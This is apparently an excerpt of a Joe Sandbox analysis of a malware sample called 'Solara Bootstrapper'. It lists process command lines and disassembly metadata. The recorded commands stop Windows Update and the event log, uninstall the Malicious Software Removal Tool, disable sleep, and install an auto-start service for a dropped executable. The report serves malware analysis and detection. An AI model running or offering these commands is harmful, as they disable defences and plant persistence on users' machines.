Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff704ea0000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop dosvc
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop wuauserv
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop bits
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff7fae50000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff7fae50000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff7fae50000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff7fae50000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dialer.exe
Imagebase:	0x7ff681550000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe delete "CKTJZLMO"
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop dosvc
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff6156c0000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff7fae50000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff7fae50000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff7fae50000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff7fae50000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dialer.exe
Imagebase:	0x7ff681550000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	64
Start time:	10:09:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	10:09:18
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop eventlog
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	10:09:18
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe start "CKTJZLMO"
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	10:09:18
Start date:	07/01/2025
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff654c90000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	69
Start time:	10:09:18
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	10:09:18
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	10:09:18
Start date:	07/01/2025
Path:	C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Imagebase:	0x7ff6699d0000
File size:	5'471'744 bytes
MD5 hash:	FB6A3B436E9F9402937D95F755B62F91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	10:09:18
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop eventlog
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	10:09:18
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe start "CKTJZLMO"
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	10:09:18
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	10:09:18
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	10:09:18
Start date:	07/01/2025
Path:	C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Imagebase:	0x7ff6699d0000
File size:	5'471'744 bytes
MD5 hash:	FB6A3B436E9F9402937D95F755B62F91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	80.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.1%
Total number of Nodes:	28
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004014D1 Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004014EB
SetUnhandledExceptionFilter.KERNEL32(004014AF), ref: 004014F9
__set_app_type.MSVCRT ref: 00401504
_controlfp.MSVCRT ref: 00401518
__getmainargs.MSVCRT ref: 00401546
exit.MSVCRT ref: 00401578

Memory Dump Source

Source File: 00000000.00000002.2096852486.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2096776503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096867623.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096867623.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098974233.0000000000E78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Solara Bootstrapper.jbxd

Similarity

API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 3649950142-0
Opcode ID: 3df386733fa54401bee5ad451dadeaeca0a1497b38bdaab36b895925076dfb24
Instruction ID: 3d199445f7a175a1fb6d4f6e9c230187ca8284bd5def60f53120883d6dbf2659
Opcode Fuzzy Hash: 3df386733fa54401bee5ad451dadeaeca0a1497b38bdaab36b895925076dfb24
Instruction Fuzzy Hash: 54110CF5E00104AFCB40EBA9EC85F4A77ECAB58308F544479F809F3361E539E9488B65

Function 0040108C Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 239
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

ShellExecuteA.SHELL32(?,?,?,00000000), ref: 004010F3
memset.MSVCRT ref: 00401108
memset.MSVCRT ref: 00401150
strcmp.MSVCRT ref: 004011E2
strcpy.MSVCRT(?,00000000), ref: 00401230
getenv.MSVCRT ref: 0040126D
sprintf.MSVCRT ref: 004012BF
fopen.MSVCRT ref: 004012D4
fwrite.MSVCRT ref: 00401339
fclose.MSVCRT ref: 00401348
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 004013A0

Strings

1 @, xrefs: 004010C7
%s\%s, xrefs: 004012B2, 004012B7
! @, xrefs: 0040109C
v1, xrefs: 00401130
`!@, xrefs: 00401110
& @, xrefs: 004010B0
q1, xrefs: 00401128
e!@, xrefs: 00401118
p!@, xrefs: 00401120

Memory Dump Source

Source File: 00000000.00000002.2096852486.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2096776503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096867623.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096867623.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098974233.0000000000E78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Solara Bootstrapper.jbxd

Similarity

API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: ! @$%s\%s$& @$1 @$`!@$e!@$p!@$q1$v1
API String ID: 3236948872-410439292
Opcode ID: 25a6402c87674cb448004a13c7e32e17225a32bb4e9f42c6cc14c45e1eeba6cb
Instruction ID: 56ce7a2ae49fa8e5fe1f54009686eb25b361c80b550f3ea0890cdf401772d490
Opcode Fuzzy Hash: 25a6402c87674cb448004a13c7e32e17225a32bb4e9f42c6cc14c45e1eeba6cb
Instruction Fuzzy Hash: 338121F1E001149BDB14DBACDC41B9E77A9EB48309F04057DF109FB392E63CAA448B68

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

:j60n8x(2vu00d[5(k=x&a--.[.)$<.8, xrefs: 0040106E

Memory Dump Source

Source File: 00000000.00000002.2096852486.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2096776503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096867623.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096867623.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098974233.0000000000E78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Solara Bootstrapper.jbxd

Similarity

API ID: malloc
String ID: :j60n8x(2vu00d[5(k=x&a--.[.)$<.8
API String ID: 2803490479-829780682
Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45

Function 0040145B Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`:vD`:v, xrefs: 0040146D, 00401470
D`:vD`:v, xrefs: 00401494, 00401499

Memory Dump Source

Source File: 00000000.00000002.2096852486.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2096776503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096867623.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096867623.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098974233.0000000000E78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Solara Bootstrapper.jbxd

Similarity

API ID: memset$ExecuteShellstrcmp
String ID: D`:vD`:v$D`:vD`:v
API String ID: 1389483452-3916433284
Opcode ID: 839a5c45aa83c197ac975d5c1cc53e810cd998e554278d7b16ccc943bd22e27a
Instruction ID: 76b88cef1d86ad1497cb396f4eac675b85de391fd72a1d1e72a6336c0f2a47e6
Opcode Fuzzy Hash: 839a5c45aa83c197ac975d5c1cc53e810cd998e554278d7b16ccc943bd22e27a
Instruction Fuzzy Hash: A7F09EB5A00208AFCB40DFE9D981D8A77F8AB4C308F5044A5F948E7351D634E9488F54

Analysis Process: powershell.exePID: 348, Parent PID: 5516COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 0443B570 Relevance: 2.8, Strings: 2, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+Ygn^, xrefs: 0443B5AC
Xgn^, xrefs: 0443B6B3

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID: +Ygn^$Xgn^
API String ID: 0-1196866723
Opcode ID: cd2b56da3da662a2c0798788b06d1e5fa70005dd0638c6da4625b0c0c5ec78a6
Instruction ID: d82ff4e74bf9d737b8e0412a205e3abbd02f18b988e32768f57ebf3cc0d3c6ec
Opcode Fuzzy Hash: cd2b56da3da662a2c0798788b06d1e5fa70005dd0638c6da4625b0c0c5ec78a6
Instruction Fuzzy Hash: 1691A671F006155BEB19DFB489105AEBBE3EF84B00B00892DD106AB764DF75AE098BC5

Function 06FE2308 Relevance: 13.1, Strings: 10, Instructions: 649COMMON

Download Yara Rule

Strings

J?l, xrefs: 06FE25EA
J?l, xrefs: 06FE23D1
J?l, xrefs: 06FE25F6
4'jq, xrefs: 06FE2619
4'jq, xrefs: 06FE260D
J?l, xrefs: 06FE237F
r>l, xrefs: 06FE254F
J?l, xrefs: 06FE23C5
r>l, xrefs: 06FE2559
J?l, xrefs: 06FE259E

Memory Dump Source

Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$J?l$J?l$J?l$J?l$J?l$J?l$r>l$r>l
